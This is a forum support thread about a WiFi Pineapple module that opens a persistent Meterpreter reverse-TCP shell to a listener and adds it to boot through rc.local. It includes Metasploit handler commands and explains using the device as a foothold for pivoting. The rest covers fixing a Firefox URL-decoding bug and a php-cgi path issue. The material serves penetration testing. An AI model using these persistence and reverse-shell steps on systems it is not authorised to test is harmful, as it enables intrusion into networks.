
[Support] Meterpreter


Darren Kitchen


New infusion! Meterpreter. Persistent reverse tcp for all your shell and pivoting needs. Enjoy!


Meterpreter Infusion version 1.0

Host - IP or Hostname of target meterpreter listener
Port - Port number of target meterpreter listener
Update Meterpreter Configuration - saves Host and Port settings in /etc/config/meterpreter configuration file.

Meterpreter Start - Starts a persistent meterpreter with configured settings. If connection fails a retry attempt will be made immediately.
Meterpreter Stop - Kills meterpreter and prevents further instances from automatically attempting connection.

Autostart Enable - Enables meterpreter on boot by adding 'pineapple infusion meterpreter&' command to /etc/rc.local
Autostart Disable - Disables meterpreter on boot by removing 'pineapple infusion meterpreter&' command from /etc/rc.local

Tips:

While general metasploit help is outside the scope of this infusion, the following commands will typically work:

    use exploit/multi/handler				# Handles multiple meterpreter sessions
    set PAYLOAD php/meterpreter/reverse_tcp		# Setting for Reverse TCP Meterpreter
    set LHOST [host or ip]				# Hostname or IP of listener
    set LPORT [port number]				# Port of listener
    set ExitOnSession false				# Let the exploit continue when meterpreter exists
    exploit -j						# Make the exploit a backgroundable job

    sessions						# Lists sessions
    sessions -i [number]				# Interacts with session number



          ,__,
          (oo)____
          (__)    )\
             ||--|| *
          Like Metasploit? 
          Perhaps you'd enjoy Metasploit Minute with Mubix! 
          http://www.metasploitminute.com </shameless plug>

Link to comment
Share on other sites

I press the download, nothing happens :(

Same here. It's at the bottom of the list and when I click it... nothing, no pop-up.

If it helps, this is the install link and the relevant JavaScript function:


http://172.16.1.10:1471/#sys/bar/preinstall/{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup
or
http://172.16.1.10:1471/#sys/bar/preinstall/{"id":"91","name":"meterpreter","version":"1.0","description":"GUI for Meterpreter reverse TCP. Accepts lhost/lport. Supports start/stop, autostart enable/disable. Provides a persistent remote shell, pivoting.","author":"hak5darren","md5":"c6c662c8ea36c4fb39bab00d2eb78c79","size":"4","type":"inf","num_downloads":"3"}/popup
function handle_hash_change(hashValue){
  //[0]:type - [1]:infusion_name - [2]:action - [3]:data - [4]:callback_function 
  var hash_array = hashValue.replace(/#/g, '').split('/');
  if(hash_array.length == 5){
    //Correct size, carry on
    $.ajaxSetup({async:false});
    if(hash_array[0] == "usr"){
      $.get('/components/infusions/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){
        try{
          window[hash_array[4]](data);
        }catch(err){
          console.log("Function not found");
        }
      });
    }else if(hash_array[0] == "sys"){
      $.get('/components/system/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){
        try{
          window[hash_array[4]](data);
        }catch(err){
          console.log("Function not found");
        }
      });
    }
    $.ajaxSetup({async:true});
  }

  //reset url so that we can call the same link again.
  window.location='#';
}

What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description.

Edited by fringes
Link to comment
Share on other sites

Same here. It's at the bottom of the list and when I click it... nothing, no pop-up.

<snip>

What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description.

As you can see, the first link you have posted is urlencoded. The second link you posted was the decoded version. Thing is, you did the decoding yourself - the WiFi Pineapple doesn't do that (as you can see, no url decoding done in the handle_hash_change function). It also shouldn't be the '/' character as the datalocker infusion works and also has a '/' in the description.

I know that on firmware 1.4.1, the download works - I just downloaded and installed the infusion once again.

Best Regards,

Sebkinne

Link to comment
Share on other sites

Aaaaaaaaaaand we got to the bottom of the issue.

Firefox automatically decodes window.location.hash, therefore this fails.

For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap.

Best Regards,

Sebkinne

Link to comment
Share on other sites
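
The failure diagnosed above, reproduced as an added example (not the WiFi Pineapple firmware's code, nor the fix that was shipped). `parseHashStrict` mirrors the split-and-count logic quoted in the thread; `parseHashTolerant`, the `allowedCallbacks` parameter and the shortened sample link are assumptions made for illustration.

```javascript
// Added illustration; not the WiFi Pineapple firmware's code.
// Fragment layout from the thread: type/infusion_name/action/data/callback

// Constructed sample, shortened from the install link quoted in the thread.
const ENCODED = '#sys/bar/preinstall/{%22name%22:%22meterpreter%22,' +
  '%22description%22:%22Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+' +
  'autostart+enable%2Fdisable.%22}/popup';
// What a browser that percent-decodes location.hash hands to the handler.
const DECODED = decodeURIComponent(ENCODED);

// The thread's approach: split on every '/', require exactly 5 parts.
function parseHashStrict(hashValue) {
  const parts = hashValue.replace(/#/g, '').split('/');
  return parts.length === 5 ? parts : null;
}

// Hypothetical tolerant parser: the first three fields and the last one
// never contain '/', so everything in between is the data field, whether
// or not the browser already decoded the fragment.
function parseHashTolerant(hashValue, allowedCallbacks) {
  const parts = hashValue.replace(/^#/, '').split('/');
  if (parts.length < 5) return null;
  const [type, name, action] = parts;
  const callback = parts[parts.length - 1];
  if (type !== 'usr' && type !== 'sys') return null;
  // name and action end up in a request path and query key: keep them plain.
  if (!/^[\w-]+$/.test(name) || !/^[\w-]+$/.test(action)) return null;
  // The original dispatches through window[hash_array[4]]; here the
  // callback name must appear in an explicit list instead.
  if (!allowedCallbacks.includes(callback)) return null;
  const rawData = parts.slice(3, -1).join('/');
  let data;
  try {
    data = decodeURIComponent(rawData.replace(/\+/g, ' '));
  } catch (e) {
    data = rawData; // stray '%' in already-decoded input: keep as-is
  }
  return { type, name, action, data, callback };
}

console.log(parseHashStrict(ENCODED) !== null);          // encoded fragment parses
console.log(parseHashStrict(DECODED));                   // decoded fragment is rejected
console.log(parseHashTolerant(DECODED, ['popup']).data); // same JSON either way
```
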

Firefox automatically decodes window.location.hash, therefore this fails.

Yes, Firefox does that. What browser do you normally recommend for the pineapple?

For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap.

Do you really think a firmware upgrade is necessary for this, or are there other fixes you're going to incorporate? It seems to me that removing the "/" characters from all the infusion descriptions should be good enough until the next release. (I see you've already done this! Get some sleep Seb. :cool:)

Thanks for getting to this so quickly. I would have opened an issue, but I was already running late for work.

PS: I just installed the Meterpreter infusion; good job.

Link to comment
Share on other sites

Hi. I really like Metasploit, but I can't figure out what exactly the Meterpreter infusion will do.

I have Kali Linux on a laptop with IP 192.168.0.100 and port 4444 that is listening with the PHP reverse TCP payload. When I start the Meterpreter infusion on mkv with 192.168.0.100 port 4444, there is a short message with the sending stage and that's all. I don't know how to use this. Where is the PHP payload and what should I do? I looked in the www folder in mkv but there is nothing.

Thanks for helping!!

Link to comment
Share on other sites

I'm not really sure what your issues are, so I'll try to give you some general help.

I assume you opened the infusion, clicked "Help" and followed the instructions. You should have seen Metasploit sending the stage to your pineapple's IP and then opening a Meterpreter session. If so, you've pwned your pineapple. (If Kali is running in a VM, make sure it's using bridged network mode; the pineapple must be able to connect to it.)

The meterpreter.php payload was installed with the infusion and can be found in the same directory tree, but that isn't relevant. You just need to start the correct handler (listener) in Metasploit (e.g. msfconsole) in Kali, point the infusion at it and click "Start."

As far as what it "will do"... Conceptually, your pineapple might be physically placed on a target network behind a firewall. So having Meterpreter running on the pineapple gives you a foothold inside that network for scanning and "pivoting" to pursue other hosts via Metasploit.

Link to comment
Share on other sites

  • 3 weeks later...
  • 1 month later...

I have been searching.

I have an idea to add to this infusion:

Using the MSF RPC API, technically you could set up a remote MSF infusion to connect to MSF through the Pineapple and control it from a web shell/interface.

The thought was:

connect to msf dropdown ip box 172.16.42.42 user pass

What do you think?

Link to comment
Share on other sites

On the current firmware (2.0.3), I get an issue with the infusion. When running the steps in the executable by hand I get:

X-Powered-By: PHP/5.4.5
Set-Cookie: PHPSESSID=a4f0e2c39e31a5528c27cee25cf91b6a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<html>

<head>
        <title>WiFi Pineapple - Login</title>
        <meta http-equiv="cache-control" content="max-age=0" />
        <meta http-equiv="cache-control" content="no-cache" />
        <meta http-equiv="expires" content="0" />
        <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
        <meta http-equiv="pragma" content="no-cache" />
        <link rel="stylesheet" type="text/css" href="includes/css/styles.php" />
        <script src="includes/js/jquery.min.js"></script>
        <noscript><meta http-equiv="refresh" content="0;url=index.php?noJS" /></noscript>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>

<body style="background-color:black; color: white;">
  <center>
<div style="background-color: black; position: absolute; margin: auto; top: 50%; left: 50%; width: 256px; height: 356; ; margin-top: -178px;">
    <img src="/includes/img/mk5_logo.gif"><br /><br />
    <form action="" method="POST">
      <table>
        <tr><td>Username:</td><td><input type="text" name="username" value="root"></td></tr>
        <tr><td>Password:</td><td><input type="password" name="password"></td></tr>
      </table>
      <input type="submit" name="login" value="Log In">
    </form>
</div>
  </center>

</body>



</html>

Modifying the executable from:

php-cgi $DIR/meterpreter.php $IP $PORT > /dev/null

to:

cd $DIR > /dev/null
php-cgi ./meterpreter.php $IP $PORT > /dev/null

seems to solve the issue.

Link to comment
Share on other sites

  • 4 weeks later...

Works fine here!

I have a question...

Does your Kali system have to be connected to the pineapple? Reason I ask is because, correct me if I'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the Kali machine is on a 10. network.

Does the pineapple send the shell or receive the shell?

Link to comment
Share on other sites

I have a question...

Does your Kali system have to be connected to the pineapple? Reason I ask is because, correct me if I'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the Kali machine is on a 10. network.

Does the pineapple send the shell or receive the shell?

Hi d0n350n,

The pineapple has multiple ip interfaces, and can be used in a variety of different configurations.

Try reading through this excellent set of guides from Scott Helme's page:

https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/

Also, I've found the info on Cisco's site helpful in the past.

http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html

It should help you understand the main points.

Cheers.

:wink:

Edited by 3mrgnc3
Link to comment
Share on other sites

Hi d0n350n,

The pineapple has multiple ip interfaces, and can be used in a variety of different configurations.

Try reading through this excellent set of guides from Scott Helme's page:

https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/

Also, I've found the info on Cisco's site helpful in the past.

http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html

It should help you understand the main points.

Cheers.

:wink:

Thanks Bro!! I figured it out, sorta, lol, but let me ask you this? I can get a meterpreter session, but none of the commands work, not even help or shell?

Link to comment
Share on other sites

  • 1 month later...

************** SOLVED ***************

I'm such a massive tool and feel I need to apologise to the community for failing to RTFM!!! :rolleyes:

phpsystems +1 You had the answer right there a few lines above....

All the best

3mrgnc3

************** SOLVED ***************

I can't for the life of me seem to get this working...

Can someone help me here?

So, in just over a week we have a big demo and equipment test week at work.

I'm trying to convince my boss to get us a load of new kit (including a box full of pineapples!)

The Meterpreter infusion is pretty central to my argument for us using the Pineapple.

Here are my settings...


I initially set up openssl and installed my own certificates for secure https web access using Firefox.

I've also reverted the nginx config back to default and tried it out using plain old http on Firefox, Iceweasel, IE 11, and the latest Chrome...

P.S. The Pineapple has been renamed to "RBx" in line with the project I'm using it for, just in case people start to wonder :grin:

Any tips?

Cheers.

3mrgnc3

Edited by 3mrgnc3
Link to comment
Share on other sites
